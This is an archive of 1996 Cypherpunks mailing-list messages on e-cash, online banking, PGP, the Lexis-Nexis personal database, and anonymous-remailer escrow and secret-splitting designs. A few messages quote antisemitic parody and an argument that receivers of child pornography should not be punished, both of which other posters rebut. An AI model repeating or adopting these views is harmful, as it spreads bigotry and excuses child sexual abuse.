>     ^^^^^^^^^^^^^^^^^^^^^^^
>But this one is tasteless and insulting even if it was 
>meant ironic.

If the boot fits.......


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
MR/2 Tag->My best view from a Window was through OS/2.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Tue, 10 Sep 1996 04:16:18 +0800
To: cypherpunks@toad.com
Subject: E-Cash Poses Worldwide Banking Threat - Report 09/06/96
Message-ID: <2.2.32.19960909160217.00a04d9c@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


		 
>PALO ALTO, CALIFORNIA, U.S.A., 1996 SEP 6 (NB) -- By Richard Bowers.  
>By the year 2000, consumers, businesses, governments, and 
>educational institutions worldwide will use electronic cash (e-cash) 
>for nine billion payment transactions. According to a new study by Killen 
>& Associates, this increase in e-cash will pose a great threat to some of 
>the biggest institutions in the world. 
>
>The report specifically highlights the risk to the retail and banking  
>industries. Speaking to Newsbytes, a spokesperson for Killen said that 
>the report, which will be issued later this month, gives little solace to 
>the problems facing traditional retail companies. The report does 
>however, say that the banks can regain the leadership position in 
>payments by moving quickly to leverage their payment transaction 
>infrastructure to fully support e-cash. 
>
>"By 2005, e-cash transactions will escalate to almost 30 billion,"  
>stated Michael Killen, president of the market research firm. "Banks 
>must act quickly to leverage their position in payment services. Non- 
>banks see this as a new opportunity to carve further market share 
>away from the banking industry. All will compete for new revenue 
>streams including Internet-based micropayments." 
>
>The report uses a very broad definition of e-cash including among  
>others; secured debit cards, phone cards, electronic checks, ATM 
>transactions, point of sale loans, and automated tolls. 
>
>Using this broad definition they estimate that in 1995 there were 536  
>billion non e-cash transactions worldwide compared to only 1 billion 
>e-cash transactions, or about .0019 percent. By the year 2005, of a 
>total estimated 1 trillion transactions, the report predicts 3 percent 
>or around 30 billion transactions will be e-cash. 
>
>"The impact of e-cash will be widespread on both banking and  
>commerce," Killen added. "Opportunities will open for financial and 
>other product and services players, including ATM vendors such as 
>NCR, Diebold, and IBM; credit card authorization firms, including First 
>Data, Total Systems, Equifax, and National Data; ATM/POS terminal 
>manufacturers and network suppliers, including bank-owned 
>networks, American Express, Deluxe, ACS, and VeriFone; and cash 
>handling/cash management services firms such as ADP, GEIS, National 
>Data, and Brinks. Software firms that understand the enormous 
>system integration opportunities of adapting legacy systems to on- 
>line, secured environments will also benefit from the need to support 
>e-cash transactions." 
>
>The report will include forecasts of the overall payments environment  
>and the impact of e-cash on cash, checks, credit cards, and other 
>electronic payment systems though the year 2005. It will also have a 
>section on the opportunities for new business, dislocations, and 
>threats to existing businesses, with emphasis on acquisition and 
>alliance opportunities. 
>
>"E-cash provides the necessary payment options to support new and  
>low-cost products and services, including micropublishing," Killen 
>continued. "Information services such as AC Nielsen, Dun & Bradstreet, 
>and Wall Street investment and advisory firms will fill their clients' 
>needs for customized news. This will lead to a new understanding of 
>personal and commercial buying patterns, wants, and needs. 
>Individual consumer purchase, transaction, and life-style profiles will 
>be developed. Advertisers can then use this information to target 
>market-customized advertising and marketing programs." 
>
>(19960906/Press Contact: Jules Street, Killen & Associates, 415-617-  
>6130) 
>  	   	
>
>
_______________________
Regards,            Nothing is so strong as gentleness, 
                    and nothing is so gentle as true strength. -Ralph Sockman
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Tue, 10 Sep 1996 04:17:10 +0800
To: cypherpunks@toad.com
Subject: IBM to unveil Internet banking alliance
Message-ID: <2.2.32.19960909160218.00a490a4@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 9 Sep 1996 11:20:03 -0400
>From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
>To: reagle@rpcp.mit.edu
>Subject: IBM to unveil Internet banking alliance
>
>
>  	  				 
>	 SAN FRANCISCO (Reuter) - International Business Machines  
>Corp. <IBM.N>  has made an alliance with more than a dozen 
>major banks to provide consumer banking services using 
>Internet technology, IBM and industry executives said Friday. 
>	 The consortium will be dubbed Integrity and will be owned  
>equally by IBM and each of the partners. 
>	 Banks will be able to use IBM's worldwide private network  
>as well as the Internet to enable their customers to do their 
>banking electronically. Specific details of the banking 
>arrangement have yet to be worked out, one of the executives 
>said. 
>	 IBM and the banking instititutions involved are due to  
>unveil the Integrity project in New York on Monday. 
>	 The alliance is one of several industry projects that  
>IBM's Internet Division is establishing to help large 
>companies utilize the Internet. 
>	 The banking alliance will have competition from other  
>electronic banking services being organised by companies like 
>Intuit Corp., America Online Inc. and Microsoft Corp. 
>	 Just this week, Intuit and America Online said a number of  
>leading financial institutions would offer their customers 
>online banking via AOL, using software developed by Intuit 
>known as BankNOW. 
>	 At an Internet and Electronic Commerce conference in San  
>Francisco this week, Intuit Chairman Scott Cook said the new 
>service targets people who want to use electronic transactions 
>to speed up their banking. 
>	 Cook said he expects the new service will differ from what  
>the IBM-led consortium might provide. 
>	 NationsBank has been among companies frequently mentioned  
>as participating in the IBM consortium, but a spokesman late 
>on Friday declined to discuss a Wall Street Journal report 
>that it would be involved in the consortium. 
>  	   	
>
>
_______________________
Regards,            Nothing is so strong as gentleness, 
                    and nothing is so gentle as true strength. -Ralph Sockman
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Susan Evoy <sevoy@sunnyside.com>
Date: Tue, 10 Sep 1996 11:42:09 +0800
To: cypherpunks@toad.com
Subject: Zimmermann gets CPSR's Wiener Award
Message-ID: <199609091905.MAA18397@snyside.sunnyside.com>
MIME-Version: 1.0
Content-Type: text/plain




* * NEWS ADVISORY * *  

FOR IMMEDIATE RELEASE					August 22, 1996
---------------------
Contact:        Computer Professionals for Social Responsibility                

                Duane Fickeisen, Interim Director       
                                
Phone:          415-322-3778  
E-mail:         dfickeisen@cpsr.org


       Phil Zimmermann, controversial inventor of  Pretty Good Privacy
(PGP), earned the prestigious  Norbert Wiener Award of 1996.  The Wiener
award is for excellence in promoting the responsible use of technology and
is given annually by Computer Professionals for Social Responsibility (CPSR).

	The award will be presented by CPSR board member Nathaniel 
Borenstein at CPSR's annual meeting on October 19-20, 1996 at Georgetown 
University in Washington, DC. The award to Zimmermann is related to the 
theme of the conference, "Communications Unleashed: What's At Stake? 
Who Benefits? How to Get Involved!," which focuses on the public interest 
in stewardship of the dazzling array of emerging communications services 
and issues related to free speech, copyright protection, and privacy online.

        CPSR is a public-interest alliance of computer scientists and
others interested in the impact of computer technology on society.   CPSR
attempts to direct public attention to difficult choices concerning the
applications of computing and how those choices affect society.

        According to CPSR Interim Director Duane Fickeisen, PGP brings
critical privacy issues to public attention, because  PGP allows the
average person to encode his or her email so only the receiver can read and
understand it.  Until PGP came along, only governments or large
corporations could make their email secure.

        In computer jargon, PGP is a "public-key encryption software."
Zimmermann, 42, created PGP and published it in the U.S.A. as "freeware"
(free software) in June of 1991.

        Since its creation, PGP has spread all over the world, and has
since become the de facto worldwide standard for encryption of email.

        Controversy came with government attempts to control encryption.
For three years Zimmermann was the target of a criminal investigation by
the US Customs Service, who assumed that laws were broken when PGP 
spread outside the US. That investigation was closed without indictment in 
January 1996.

      Zimmermann wrote PGP from information in the open literature, putting
it into a convenient package that everyone can use in a desktop or palmtop
computer. "I gave it away for free, for the good of democracy. This
technology belongs to everybody," he says.

        According to Zimmermann, the recent strides in electronic digital
communication brought with them a "disturbing erosion of our privacy. In
the past, if the government wanted to violate the privacy of ordinary
citizens, it had to expend a certain amount of effort to intercept and
steam open and read paper mail, and listen to and possibly transcribe
spoken telephone conversation. This is analogous to catching fish with a
hook and a line, one fish at a time. Fortunately for freedom and democracy,
this kind of labor-intensive monitoring is not practical on a large scale."

     Today, human rights organizations such as Amnesty International are
using PGP to protect their people overseas.  "PGP has spread like a prairie
fire, fanned by countless people who fervently want their privacy restored
in the information age," says Zimmermann.

	Unfortunately, email messages are too easy to intercept and scan for
interesting keywords, such as "revolution" or "abortion."  This "fishing"
can be done routinely and invisibly on a grand scale. When most of the
population becomes reliant on email, the government will be able to do
"driftnet fishing" -- making a quantitative and qualitative Orwellian
difference to the health of democracy, Zimmermann said.

        Law enforcement and intelligence interests in the government have
attempted many times to suppress the availability of strong domestic
encryption technology. However, Zimmermann doubts their chances for
success.

        He says, "The rest of the world uses encryption and they laugh at
the US because we are railing against nature, trying to stop encoding
messages. Trying to stop this is like the buggy whip manufacturers trying
to stop the adoption of cars -- even with the NSA and the FBI on the
government side, it's still impossible. The information revolution is good
for democracy -- good for a free market and trade."

        "The government has a track record that does not inspire confidence
that they will never abuse our civil liberties," says Zimmermann, who is
now Chairman of the Board and Chief Technology Officer for Pretty Good
Privacy, Inc. (PGP).

For more information on the conference or the Wiener Award, 
contact CPSR at 415-322-3778, 703-739-9320, cpsrannmtg@cpsr.org,
http://www.cpsr.org/home.html.
--
Susan Evoy   *   Deputy Director                     
http://www.cpsr.org/home.html    
Computer Professionals for Social Responsibility
P.O. Box 717  *  Palo Alto  *  CA *  94302         
Phone: (415) 322-3778    *   Fax: (415) 322-4748     *   Email: evoy@cpsr.org   
*    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 10 Sep 1996 05:02:15 +0800
To: Martin Minow <minow@apple.com>
Subject: Re: Imminent Death of the Internet, GIF at 11
In-Reply-To: <v03007802ae575f5ed09b@[17.219.103.73]>
Message-ID: <199609091614.MAA24724@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Martin Minow writes:
> For several months (years?) Bob Metcalf has been predicting that
> the Internet will self-destruct from overload. His argument
> appears to follow one of Gordon Bell's maxims: "anyone can predict
> the future: all you need is semi-log paper and a ruler." As I
> understand it, Metcalf's argument is that network load (messages,
> packets) is growing exponentially, while network bandwidth (fiber
> capacity, switch performance) is growing linearly. At some point,
> these two curves cross -- and demand will exceed capacity.

Except for the following.

1) TCP backs off.
2) Capacity is growing exponentially.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Fabbro <afabbro@umich.edu>
Date: Tue, 10 Sep 1996 05:07:01 +0800
To: cypherpunks@toad.com
Subject: Lexis-Nexis Database
Message-ID: <Pine.SUN.3.95.960909123448.15324C-100000@stimpy.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Note: personal experience indicates that L-N can remove you without
your SSN, so there's no need to provide it, though they'll ask for it.
Expect to attend a mandatory on-hold-music concert with a 20-25 minute
program.  L-N won't verify if your name is in the database, but will
"performa process which will remove you if you are there".

Andrew Fabbro <afabbro@umich.edu>
ITD Marketing Research          
http://www-personal.umich.edu/~afabbro/
PGP mail preferred; finger for key    


----------------------------------------------------------------------
PRIVACY Forum Digest      Tuesday, 3 September 1996      
Volume 05 : Issue 17
----------------------------------------------------------------------

Date:    Tue, 3 Sep 1996 11:22:15 -0400 (EDT)
From:    Larry Hunter <hunter@intr.net>
Subject: Lexis-Nexis personal information database

Lexis-Nexis sells a commercial database called "Ptrax" which holds
detailed personal information on nearly all Americans (L-N claims it
contains 300 million names).  This database includes name, current
address, up to two previous addresses, phone number, birth-date, social
security number, mother's maiden name and possible other personal
information.  This database is kept quite current.  Through the Nexis
Express service, this information could be available to any individual
with a credit card.

As most readers will are aware, such information could easily be used
for theft of identity and other frauds.  It is possible to have one's
name removed from this database by making a telephone request.  Call
(800)543-6862, select option 4 ("all other questions") and tell the
representative answering that you wish to remove your name from the
Ptrax database.  You may also send a fax to (513)865-7360, or physical
mail to LEXIS-NEXIS / P.O. Box 933 / Dayton, Ohio 45401-0933.  Sending
physical mail to confirm your name has been removed is always a good
idea.

As word of the existence of this database has spread on the net,
Lexis-Nexis has been inundated with calls, and has set up a special set
of operators to handle the volume.  In addition, Andrew Bleh (rhymes
with "Play") is a manager responsible for this product, and is the
person to whom complaints about the service could be directed.  He can
be reached at the above 800 number, selection option 4 and then ask for
extension 3385.

The information in this note has been been confirmed by me, and was
originally provided in forwarded messages from Russell Whitaker, Jason
Werner, Vern Winters, Katherine Florman and Reuben Snipper.

Larry Hunter
hunter@intr.net

------------------------------

End of PRIVACY Forum Digest 05.17
************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com
Date: Tue, 10 Sep 1996 05:02:06 +0800
To: cypherpunks@toad.com
Subject: Re: TWA 800 - hit by an unarmed US missile?
In-Reply-To: <Pine.LNX.3.91.960909074055.27745B@offshore>
Message-ID: <199609091638.MAA19400@mail2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


vince@offshore.com.ai (Vincent Cate):

> If the Navy was firing missiles in this area, it really does seem like the
> press should be checking out this angle. 

   What makes you think they aren't?


/t




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Mon, 9 Sep 1996 22:00:40 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: ... subversive leftists
In-Reply-To: <ae544a4003021004ad89@[207.167.93.63]>
Message-ID: <Pine.LNX.3.94.960909125148.16761A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



I hope this one was ironic.

> The Democratic People's German Reich is fully justified in cutting off
> contacts with subversive radical publications in Jew-dominated nations like
> Holland.
> 
> As Reichskommander Schmidt points out: "The citizen-units who access
     ^^^^^^^^^^^^^^^^^^^^^^^
But this one is tasteless and insulting even if it was 
meant ironic.

-stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 10 Sep 1996 07:47:48 +0800
To: Floyd W Odom <doom13@juno.com>
Subject: Re: 9yrold
In-Reply-To: <19960908.125436.3318.0.Doom13@juno.com>
Message-ID: <Pine.LNX.3.93.960909125358.1028N-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



     This worked in RL once, so I'll try it here. 

     What you do is look the pest in the eye and say:

     GO AWAY. In a really loud voice. 

On Sun, 8 Sep 1996, Floyd W Odom wrote:

> Does anyone out there know any kids mailing lists, because my little
> brother Richard just joined and he doesn't have anything to mail to he's
> only 9 years old.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Tue, 10 Sep 1996 05:51:46 +0800
To: enzo@ima.com
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <Pine.WNT.3.95.960909174949.-917231C-100000@stanley.ima.net>
Message-ID: <9609091707.AA27901@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>I and you may well choose to do so, but the vast majority of the human
>beings believe just anything that is repeated loud and long enough.
>Otherwise, nobody would hire PR and pay for advertisement, politicians
>wouln't be fedwith taxpayer's money, Bosnians would trade goods instead
>of gunshots, etc. I'm personally not interested in conjuring up the latest
>utopia for a minoritarian sect of illuminati: I need to live in the real
>world, and push for viable solutions that change it for better, now.

The question is not whether defamation is a problem but whether the
courts make the problem better or worse. I think that any analysis
of the behaviour of the scientologists would indicate that the courts
make the problem worse. Similarly the English libel laws have been used
by a long line of crooks and swindlers to extort money. Robert Maxwell
being an extreeme example.

The thing about the Internet is that it is possible to make a reply.

This does not help of course in the example cited, but I don't think
that the Mutlu/Serdar flamebot could have been dealt with through
the court system. (For those of you who don;t know, a poster calling
himself first Hasan B Mutlu, then Serdar Argic used to make insulting
responses to anyone who made a USEnet post about the middle east. Mutlu
was in fact a perl script run by an agent of the Turkish intelligence
services, the objective being to discredit all mention of the Turkish
massacre of the Armenians through use of counter propaganda. Mutlu
dissapeared from the net at the same time that the sysop of the system 
he was posting from was deported for overstaying his visa.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 10 Sep 1996 08:18:41 +0800
To: Stephan Schmidt <schmidt@pin.de>
Subject: Re: [WAS xs4all.nl] Terrorists
In-Reply-To: <Pine.LNX.3.94.960909105907.14405B-100000@blau.pin.de>
Message-ID: <Pine.LNX.3.93.960909131337.1028P-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996, Stephan Schmidt wrote:

> One thought : How many of you would support terrorist
> web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?

     If Iran, the IRA, etc. wanted to pay me to host a web page that 
described their goals and methods, I would.  

     I believe in free speach, and that means even if I disagree. 

     Then again, the only reason I am not a terrorist is that the government
hasn't YET defined hate speach directed against the government to be  
terrorism.

     
     


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 10 Sep 1996 11:05:52 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [WAS xs4all.nl] Terrorists
In-Reply-To: <VcNZTD64w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.93.960909132629.1028S-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> Stephan Schmidt <schmidt@pin.de> writes:
> > One thought : How many of you would support terrorist
> > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?
> 
> http://www.terrorist.org ?

smoke:~> whois terrorist.org
[rs.internic.net]
Terrorist Organization (TERRORIST2-DOM)
   1525 SW 14th #4
   Portland, OR 97201
   US

   Domain Name: TERRORIST.ORG

   Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
      Sievert, Jerry  (JS651)  jerrys@E-Z.NET
      360-260-1122

   Record last updated on 26-Jun-96.
   Record created on 26-Jun-96.

   Domain servers in listed order:

   E-ZONE.E-Z.NET               205.240.28.1
   NS1.IXA.NET                  199.242.16.1


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Tue, 10 Sep 1996 10:03:17 +0800
To: pjb@ny.ubs.com
Subject: Re: talker
In-Reply-To: <199609091814.OAA03889@sherry.ny.ubs.com>
Message-ID: <Pine.3.89.9609091334.A27897-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996 pjb@ny.ubs.com wrote:

> > Floyd W Odom writes:
> > > 	I am doom13. If there is anyone out there who is a hacker or
> > > would like to be one you can talk to me and find out stuff like cracking.
> > > Just drop a message at doom13@juno.com.
> > 
> > Are you the same jerk who was posting a week ago?
> > 
> sure sounds like it. is it possible that there could be two such as this?
> 
> 	-paul

Very possible.  Try reading the alt.2600 newsgroup for about a week and see 
how many me-too, teach-me-how2hack, and other lame messages are posted 
there on a daily basis.  God help us now that they've discovered mailing 
lists.  "h3y, w0w, d00dz, th1s cyberpun|< li5t is way |<3\/\/L!"
(Translation: Hey, wow, dudes, this cyberpunk list is way cool!
for those of you who are asciially impaired :) 

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Tue, 10 Sep 1996 08:42:52 +0800
To: cypherpunks@toad.com
Subject: Re: Kiddie porn on the Internet
In-Reply-To: <50us2f$o5c@life.ai.mit.edu>
Message-ID: <323459CE.31DF@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> 
> "News" stories are now circulating on radio about child pornography on
> the Internet, and how an organization called "Save The Children" is
> working very hard to identify the trafficers and their accomplii.
> 
> Save The Children is complaining that they can't find all of the dirty
> dealers of kid-porn, since much of the traffic is encrypted!
> 
> So who is Save The Children? First, since they're an international
> organization raising funds in the U.S., they obviously operate at the
> pleasure of the State Department. Ho hum. Remember the incidents at the
> Denny's restaurant chain where Denny's was sued for discrimination
> against minorities? Did it seem a little bizarre for the 1990's?

I'm trying to work out just what sort of confused idea is going on
here. Save the Children is an international charity that is based
in the UK. It is ultra respectable, Princess Ann being its president
and very active in that role (ie not merely titular). Its also 
a-political which it has to be for tax reasons and because otherwise 
the royals couldn't have anything to do with it.

Their main mission is sending food to Ethiopia and other famine
areas, development work etc. It is ultra-worthy stuff.

I think that a more rational explanation of the Dennys case is that
being weasels the Dennys management decided they needed some good PR
before the judgement brought them bad PR.

>*** The recievers of the porn should not be punished for the photographers
>action, the same as if I would complain that someone burglarized my home becuase
>i left the door open. It was their ignorance that caused their loss. 

Its the consumers who create a market. If someone burgals your house and
I knowingly buy the stolen goods its a crime.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Tue, 10 Sep 1996 00:49:54 +0800
To: peter.allan@aeat.co.uk
Subject: Re: Job for netescrow ? (was Secure anonymouse server protocol...
Message-ID: <9609091255.AA28353@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




Adam and Matt put my casual remark under the grill:

  Peter Allan <peter.allan@aeat.co.uk> writes on cpunks:

  > [Matt Blaze's  Oblivious Key Escrow paper]
     ftp://ftp.research.att.com/dist/mab/netescrow.ps
  >
  > This all hinges on a policy to be followed by archive holders defining
  > the conditions under which they release their shares.  
  > This could be receipt of a signed request from the owner (remailer).
  > 
  > Maybe the table relating nyms to reply addresses could be stored in
  > netescrow style so that captured remailers reveal nothing.  The problem
  > of operator coercion is not addressed by this.


Adam:
> Just to clarify, if I understand correctly you are proposing a penet
> style system with the database held in `netescrow'.

Yes.  What I had in mind resembled the split list scheme used at a church I
used to go to.  UK tax law has concessions for regular giving (Covenants, in the jargon)
and the church needed to know that comittments were being met.  At the same time it was
preferred not to know who was giving what.  This was done by having 2 lists eg

Namelist:  Mr J Smith  = member 999

Cashlist:  member 999 gives  1000 / month

If member 999 didn't give as planned, cashlist-holder could say to namelist-holder
"have a word with 999".

These were held by 2 people, trusted not to collude.  Also I suppose committee
reshuffles shouldn't put one person straight into the other post.

My idea was to replicate this split list so that

addrlist:  leukos.gleukos@c2.org  = index97b6150200000564
nymlist:   index97b6150200000564  = an0001002304000101@this.remailer

This would be altered for the remailer table as:

addlist: leukos.gleukos@c2.org            = index97b6150200000564
addlist: an0001002304000101@this.remailer = index97b6150200400281

and these 2 mappings would be escrowed:

index97b6150200000564 -> index97b6150200400281
index97b6150200400281 -> index97b6150200000564

(Or just escrow the _keys_ for the latter, as Matt first thought.)


>                        However the aim is not to prevent others
> censoring your publically available writings, but to allow a second
> avenue of access only in the case of `mob cryptography'.

The aim is to prevent a seized remailer having its data read.
The "angry mob cryptanalysis" is a side issue.


 >      If the police are unsucessful (seems likely) does this offer the
 >      operator much solice in his jail time for contempt of court, to
 >      know that he has a vote of confidence in the moral correctness of
 >      his decision from a population of the net?
    
 >      Does it offer him any legal benefit?  Are the share holders guilty
 >      of contempt also, does this lessen his guilt, and harshness of
 >      prosecution?  (Remember that the share holders' identity and
 >      location are unknown to the operator...
    
 >      I'm not sure how useful this part is, unless the possibility of
 >      `mob cryptography' is the desired feature.  I'd have thought an
 >      individual remailer operator would be more likely to fold than a
 >      group of anonymous crypto-anarchists.

I did say this didn't address operator coercion.  The widespread
cross-jurisdiction aspects of netescrow will be important here.

Capture of hardware without scope for operator coercion would be
protected against - but is an easy problem anyway.
    

 >  2.  You could add the twist of an alternative duress key, that would
 >      stand a real chance of successfully nuking the database.  More
 >      satisfying.
    

I was thinking of calling this the "shredder ticket" and giving it to
the sender (who can then distribute it to all remaining remailers without
needing to use the seized one).  This would depend on him realising that
the remailer was (about to be) seized, and would have to be done before
the enemy rounded up the shares.  [Incidentally I'm not that keen on
regarding the police as the enemy.  My mention of "angry mob cryptanalysis"
in the event of a crime was to show that it was not the ideal vehicle for
crime.  But then maybe I'm a statist pig.]


In any case it would be necessary to 

 >  3.  Negative comment on the system: TLAs have a vested interest in
 >      themselves being most of the share holders.  True of the ownership
 >      of the current remailers also of course.
 >  

The widespread cross-jurisdiction aspects of netescrow will be important here.
(Perhaps including compulsory cross-border secret reassembly. )

I was envisaging this being combined with Mixmaster.  (I see from your
Eternity post that you'd run a netescrow scheme that way.)  This gives
us "vertical integration"  a sort of "of the remailers, by the remailers
and for the remailers".  Careful design of message formats could make it
hard to tell the escrow mechanics from the traffic.  To mount this collusion
attack the TLAs would have to be part of the scheme - helping to pass most 
anonymous messages in order to trace some random ones, not necessarily those
they want to trace. (If there was nothing in it for them they wouldn't join.)

(Compare that to the current state quoted as near as I can remember from AC2
  "It seems reasonable to assume that the NSA can break any message that it
   intercepts, but not all messages")

It takes time to collect the shares and determine the next destination,
during this time the message is sat in a pool. (Is there scope for traffic
analysis in the fact that the average speed of messages will be lower
than that of shares ?)

With that in mind I was looking at the scope for cheating.

Cheating seems possible by:

1)  Collusion (as mentioned)

2)  Not releasing (valid) shares when requested
    This can be caught by traps.  The list of where the
    shares went is usually destroyed, but need not be.
    The shareholders are none the wiser, and when they get
    known for not releasing shares the remailer excludes them
    from future share issues.

3)  Flooding attacks - storing rubbish in escrow servers who
    are eventually forced to accept no more shares, or ditch
    some existing ones.  So far as I can see Matt's Netescrow
    scheme has exactly this problem.  Ecash payments might help.
    If existing shares are ditched the reply-ability will not last
    long.  You might get a message you can reply to for 2 weeks, but 
    no later.  Sender might resend periodically - a bit like following
    up an unanswered snail mail.

 >  At the same time it would provide an argument against GAK, all
 >  legitimate (in the publics eyes, what other opinions count, this is a
 >  democracy isn't it) law enforcement needs met.

As in the last sentence or so of the OKE paper.



Matt:
 >  My original idea for OKE was as a way to backup long-term,
 >  slow-changing sensitive data without also introducing a single point
 >  of failure for either security or availability.  The remailer model is
 >  a bit different, and I'm not sure it's a good fit, in particular
 >  because I haven't thought about the various new failure modes in this
 >  application.  But let me think ``out loud.''
 >  
 
 >  So can this scheme be improved upon?  Is there a better way to run a
 >  persistent-reply-address remailer?  These are interesting, and I think
 >  largely open, questions.



 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Tue, 10 Sep 1996 07:52:57 +0800
To: cypherpunks@toad.com
Subject: CATO terrorism conference -- tomorrow @ 8:30 am, free
Message-ID: <v01510102ae5a19489388@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


More info on tomorrow's terrorism conference at CATO is at:

 http://www.cato.org/events/calendar.html

This is especially timely given the report that the Aviation Safety and
Security Commission (chaired by Gore) sent to Clinton with 20
recommendations. One is to enact "automated passenger profiling" of all
domestic travellers, which would include airline access to FBI/CIA
databases. This $10 million project bans anonymous air travel and, needless
to say, raises significant privacy questions.

-Declan


>Date: Mon, 9 Sep 1996 12:23:13 -0400
>Mime-Version: 1.0
>To: declan@well.com (Declan McCullagh)
>From: Solveig Bernstein <sberns@cato.org>
>Subject: Terrorism Conference
>
>Cato's Conference, *Combatting Terrorism, Preserving Freedom," scheduled for
>Tuesday, September 10, 1996 is now
>
>
>* FREEEEE*
>
>That's right, the registration fee of $50 has been WAIVED!!!
>
>Come listen to Nadine Strossen, Dorothy Denning, David Kopel, and many
>others discuss terrorism, foreign policy, civil liberties, and the
>telecommunications infrastructure.
>
>Please redistribute freely.
>
>Conference begins at 8:30 at 1000 Mass. Ave.
>
>
>- Solveig
>**********************************************************************
>Solveig Bernstein, Esq.
>(202) 789-5274
>(202) 842-3490 (fax)
>
>Assistant Director of Telecommunications & Technology Studies
>Cato Institute
>1000 Mass. Ave. NW
>Washington, DC 20001
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Tue, 10 Sep 1996 09:36:04 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: towards an eternity service
In-Reply-To: <199609082212.XAA00383@server.test.net>
Message-ID: <Pine.BSF.3.91.960909131046.196B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> The other requirement for eternity is that the data should be secret
> shared.
[snip]
> As the eternity www servers don't know what the data in the shares
> they are holding is, they can't provide the indexing facility

I don't know much about secret sharing algorithms, but wouldn't the server
be able to get the other parts of the shares and know what it's serving?
The ability to get that information might affect server liability. 

With secret splitting, there is a simple way to create duress parts. I 
don't know if it's possible with secret sharing..

X is politically-incorrect data.
Y is data nobody would ever object to.
R is a truely random string of bits.

Alice has X xor R on her server.
Bob has R on his server.
Carol has X xor Y xor R on her server.
Dave has Y xor R on his server.

Alice and Bob are together distributing X. So are Dave and Carol. 
However, if someone were to say that Alice and Bob (and/or Dave and Carol)
are distibuting something politically incorrect, Alice and Carol (and Bob
and Dave) can get together and say "No, We're distributing Y. The other
person must be trying to frame me!". In fact, it's quite possible that
